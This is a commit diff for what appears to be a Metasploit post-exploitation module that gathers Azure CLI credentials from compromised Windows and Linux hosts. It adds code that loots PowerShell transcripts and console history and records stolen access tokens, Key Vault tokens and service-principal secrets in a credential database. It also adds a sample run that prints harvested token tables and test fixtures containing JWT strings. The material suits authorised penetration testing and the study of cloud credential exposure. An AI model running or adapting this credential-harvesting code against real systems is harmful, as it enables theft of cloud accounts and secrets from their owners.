updates to azure cli creds

h00die · h00die · commit b4975f6a23e6 · 2024-06-24T17:06:04.000-04:00
diff --git a/documentation/modules/post/multi/gather/azure_cli_creds.md b/documentation/modules/post/multi/gather/azure_cli_creds.md
@@ -39,6 +39,65 @@ Successfully tested on:
 [*] Post module execution completed
 ```
 
+### Windows 10
+
+```
+msf6 post(multi/gather/azure_cli_creds) > rerun
+[*] Reloading module...
+
+[*] az cli version: 2.61.0
+[*] Looking for az cli data in C:\Users\kali
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*]   Checking for console history files
+[+]     C:\Users\kali/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.console_hi_878016.txt
+[*]   Checking for powershell transcript files
+[*] Looking for az cli data in C:\Users\h00die
+[*]   Checking for config files
+[+]     .Azure\config stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.config.ini_539242.txt
+[*]   Checking for context files
+[+]     .Azure/AzureRmContext.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.context.js_041230.txt
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.profile.js_538496.txt
+[*]   Checking for console history files
+[+]     C:\Users\h00die/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.console_hi_210490.txt
+[*]   Checking for powershell transcript files
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20150720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_021248.txt
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20230720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_743088.txt
+[+] Line 1 may contain sensitive information. Manual search recommended, keyword hit: New-PSSession
+[+] Subscriptions
+=============
+
+ Account Name               Username                              Cloud Name
+ ------------               --------                              ----------
+ EXAMPLE11111               1111111111111-1111-1111-111111111111  AzureCloud
+ N/A(tenant level account)  james@example12.onmicrosoft.com       AzureCloud
+
+[+] Context
+=======
+
+ Username                           Account Type      Access Token                           Graph Access Token                       MS Graph Access Token  Key Vault Token                       Principal Secret
+ --------                           ------------      ------------                           ------------------                       ---------------------  ---------------                       ----------------
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng                         eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ 111                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz  1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVU                         Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                 (clip)                                                          (clip)
+ HelpDeskAdmin@example123456.onmic  User
+ rosoft.com
+ 1111111111111-1111-1111-111111111  ServicePrincipal
+ a1c
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI                                                                  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ f40                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz                                                                  Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                                                                                 (clip)
+ storageviewer@example12.onmicros  User
+ oft.com
+
+[*] Post module execution completed
+msf6 post(multi/gather/azure_cli_creds) > 
+```
+
+### Older Run
+
 ```
 msf5 post(multi/gather/azure_cli_creds) > run
 
diff --git a/modules/post/multi/gather/azure_cli_creds.rb b/modules/post/multi/gather/azure_cli_creds.rb
@@ -37,6 +37,23 @@ def initialize(info = {})
     )
   end
 
+  def rep_creds(user, pass, type)
+    create_credential_and_login({
+      # must have an IP address, can't be a domain...
+      address: '13.107.246.69', # 'portal.azure.com' https://www.nslookup.io/domains/portal.azure.com/dns-records/ June 24, 2024
+      port: 443,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      origin_type: :service,
+      private_type: :password, # most are actually JWT (cookies?) but thats not an option
+      private_data: pass,
+      service_name: "azure: #{type}",
+      module_fullname: fullname,
+      username: user,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    })
+  end
+
   def parse_json(data)
     data.strip!
     # remove BOM, https://www.qvera.com/kb/index.php/2410/csv-file-the-start-the-first-header-column-name-can-remove-this
@@ -68,12 +85,15 @@ def get_az_version
     command = 'az --version'
     command = "powershell.exe #{command}" if session.platform == 'windows'
     version_output = cmd_exec(command, 60)
-    version_output.match(/azure-cli \((.*)\)/)
+    # https://rubular.com/r/wW02GJq51WDa0p
+    version_output.match(/azure-cli\s+[(]?([\d.]+)[)]?/)
   end
 
   def run
     version = get_az_version
-    unless version.nil?
+    if version.nil?
+      print_status('Unable to determine az cli version')
+    else
       print_status("az cli version: #{version[1]}")
     end
     profile_table = Rex::Text::Table.new(
@@ -129,6 +149,14 @@ def run
         results = process_context_contents(data)
         results.each do |result|
           context_table << result
+          next if result[0].blank?
+          next unless framework.db.active
+
+          rep_creds(result[0], result[2], 'Access Token') unless result[2].blank?
+          rep_creds(result[0], result[3], 'Graph Access Token') unless result[3].blank?
+          rep_creds(result[0], result[4], 'MS Graph Access Token') unless result[4].blank?
+          rep_creds(result[0], result[5], 'Key Vault Token') unless result[5].blank?
+          rep_creds(result[0], result[6], 'Principal Secret') unless result[6].blank?
         end
       end
 
@@ -185,6 +213,24 @@ def run
           print_good(result)
         end
       end
+
+      # https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.host/start-transcript?view=powershell-7.4#description
+      vprint_status('  Checking for powershell transcript files')
+      dir("#{user_directory}/Documents").each do |file_name|
+        next unless file_name =~ /PowerShell_transcript\.[\w_]+\.[^.]+\.\d+\.txt/
+
+        possible_location = "#{user_directory}/Documents/#{file_name}"
+        data = read_file(possible_location)
+        next unless data
+
+        loot = store_loot 'azure.transcript.txt', 'text/plain', session, data, possible_location, 'Powershell Transcript'
+        print_good "    #{possible_location} stored in #{loot}"
+
+        results = print_consolehost_history(data)
+        results.each do |result|
+          print_good(result)
+        end
+      end
     end
 
     print_good(profile_table.to_s) unless profile_table.rows.empty?
diff --git a/spec/lib/msf/core/post/azure_spec.rb b/spec/lib/msf/core/post/azure_spec.rb
@@ -251,6 +251,43 @@
         },
         'ExtendedProperties' => {}
       },
+      'Example (aaaaaaaa-1111-1111-aaaa-111111111112) - aaaaaaaa-1111-1111-aaaa-111111111112 - aaaaaaaa-1111-1111-aaaa-111111111112' => {
+        'Account' => {
+          'Id' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+          'Credential' => nil,
+          'Type' => 'ServicePrincipal',
+          'TenantMap' => {},
+          'ExtendedProperties' => {
+            'Subscriptions' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+            'Tenants' => 'aaaaaaaa-1111-1111-aaaa-111111111112'
+          }
+        },
+        'Tenant' => {
+          'Id' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+          'Directory' => nil,
+          'IsHome' => true,
+          'ExtendedProperties' => {}
+        },
+        'Subscription' => {
+          'Id' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+          'Name' => 'Example',
+          'State' => 'Enabled',
+          'ExtendedProperties' => {
+            'SubscriptionPolices' => '{"locationPlacementId":"Public_2014-09-01","quotaId":"PayAsYouGo_2014-09-01","spendingLimit":"Off"}',
+            'Account' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+            'AuthorizationSource' => 'RoleBased',
+            'HomeTenant' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+            'Tenants' => 'aaaaaaaa-1111-1111-aaaa-111111111112',
+            'Environment' => 'AzureCloud'
+          }
+        },
+        'Environment' => {},
+        'VersionProfile' => nil,
+        'TokenCache' => {
+          'CacheData' => nil
+        },
+        'ExtendedProperties' => {}
+      },
       'Example (aaaaaaaa-1111-1111-aaaa-111111111122) - aaaaaaaa-1111-1111-aaaa-111111111111 - aaaaaaaa-1111-1111-aaaa-111111111111' => {
         'Account' => {
           'Id' => 'aaaaaaaa-1111-1111-aaaa-111111111122',
@@ -496,6 +533,7 @@
       expect(subject.send(:process_context_contents, azure_rm_context)).to eql([
         ['user1@example.onmicrosoft.com', 'User', nil, nil, nil, nil, nil],
         ['aaaaaaaa-1111-1111-aaaa-111111111111', 'ServicePrincipal', nil, nil, nil, nil, 'aaA1A~aaA~a~a1AAA1AAAa1aAA1AA1A11AAAAaaa'],
+        ['aaaaaaaa-1111-1111-aaaa-111111111112', 'ServicePrincipal', nil, nil, nil, nil, nil],
         [
           'aaaaaaaa-1111-1111-aaaa-111111111122', 'AccessToken',
           'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVUhIMCIsImtpZCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVUhIMCJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvMmQ1MGNiMjktNWY3Yi00OGE0LTg3Y2UtZmU3NWE5NDFhZGI2LyIsImlhdCI6MTcxNzQ3OTc5NywibmJmIjoxNzE3NDc5Nzk3LCJleHAiOjE3MTc1NjY0OTcsImFpbyI6IkUyTmdZSWliOGY3QndmVi8yUE5idXF3M1M0bzdBZ0E9IiwiYXBwaWQiOiIyZTkxYTRmZS1hMGYyLTQ2ZWUtODIxNC1mYTJmZjZhYTlhYmMiLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yZDUwY2IyOS01ZjdiLTQ4YTQtODdjZS1mZTc1YTk0MWFkYjYvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiIzMGU2NzcyNy1hOGI4LTQ4ZDktODMwMy1mMjQ2OWRmOTdjYjIiLCJyaCI6IjAuQUhBQUtjdFFMWHRmcEVpSHp2NTFxVUd0dGtaSWYza0F1dGRQdWtQYXdmajJNQlBFQUFBLiIsInN1YiI6IjMwZTY3NzI3LWE4YjgtNDhkOS04MzAzLWYyNDY5ZGY5N2NiMiIsInRpZCI6IjJkNTBjYjI5LTVmN2ItNDhhNC04N2NlLWZlNzVhOTQxYWRiNiIsInV0aSI6IkJ6YmQwak85ODBxR3lDZnFvOVZFQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy9iNDEzODI2Zi0xMDhkLTQwNDktOGMxMS1kNTJkNWQzODg3NjgvcmVzb3VyY2Vncm91cHMvUmVzZWFyY2gvcHJvdmlkZXJzL01pY3Jvc29mdC5XZWIvc2l0ZXMvdmF1bHRmcm9udGVuZCIsInhtc190Y2R0IjoxNjE1Mzc1NjI5fQ.HohJOJpOV-FVI5h5uCD3aRXm2CWQxxEPGeYhzmvbupRjwCJPQW7BQ4hiGdRk9KuEHiQ_WYrPNqVMOah948V2UjtqiDhPQg01H_qriQXhaIdmVa0ou7_ptZy9rmBR2iLLtUZFU3yCAEdNxJkdho-o5vlP6bWDld_EE5CTnqI0bO-PeVSNSAYFxAEmO4qqzMgqM-QzDOF9paMVnHDmiBhN76wUFIera6JRmeEjlkKiNknW_jsmgV_u4F5EoRmdlGivZ1DDYvpndOofuhvnCggK56HL8WNmIotmmNVQgUM0OPaorFhhxWmeJ9_wrPdFgI5uiTw9sE9gxOKj7Qdw1nxcHg',
